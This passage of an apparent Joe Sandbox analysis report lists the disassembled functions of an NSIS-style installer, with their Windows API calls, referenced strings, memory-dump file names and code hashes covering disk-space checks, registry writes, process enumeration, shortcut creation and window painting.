GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,759223A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

A, xrefs: 00404662
F, xrefs: 004046A0

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

%s: failed opening file "%s", xrefs: 00406F38
GetTTFNameString, xrefs: 00406F33
name, xrefs: 00406FEB

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,759223A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,759223A0,00000000), ref: 00406A73

Strings

F, xrefs: 00406858
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B
F, xrefs: 00406A7F
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32 ref: 00406509

Strings

EnumProcessModules, xrefs: 004064B6
Unknown, xrefs: 00406528
CreateToolhelp32Snapshot, xrefs: 004065E1
PSAPI.DLL, xrefs: 00406490
GetModuleBaseNameW, xrefs: 004064C0
Module32NextW, xrefs: 0040660A
Process32FirstW, xrefs: 004065E9
Kernel32.DLL, xrefs: 004065C7
EnumProcesses, xrefs: 004064AE
Module32FirstW, xrefs: 004065FF
Process32NextW, xrefs: 004065F4

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32 ref: 00404199
GetDlgItem.USER32 ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32 ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32 ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32 ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32 ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

N, xrefs: 00404298
F, xrefs: 004042D3
open, xrefs: 0040430B

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32 ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

%s=%s, xrefs: 00406B6F
plF, xrefs: 00406B54
[Rename], xrefs: 00406BF4, 00406C03
^F, xrefs: 00406ACF
NUL, xrefs: 00406ACA

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32 ref: 004010ED
DeleteObject.GDI32 ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32 ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32 ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_yoda.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

@bG, xrefs: 00406162
RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC

Memory Dump Source

Source File: 0000000B.00000002.2267994392.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2267948889.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268037420.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268081261.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2268270845.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

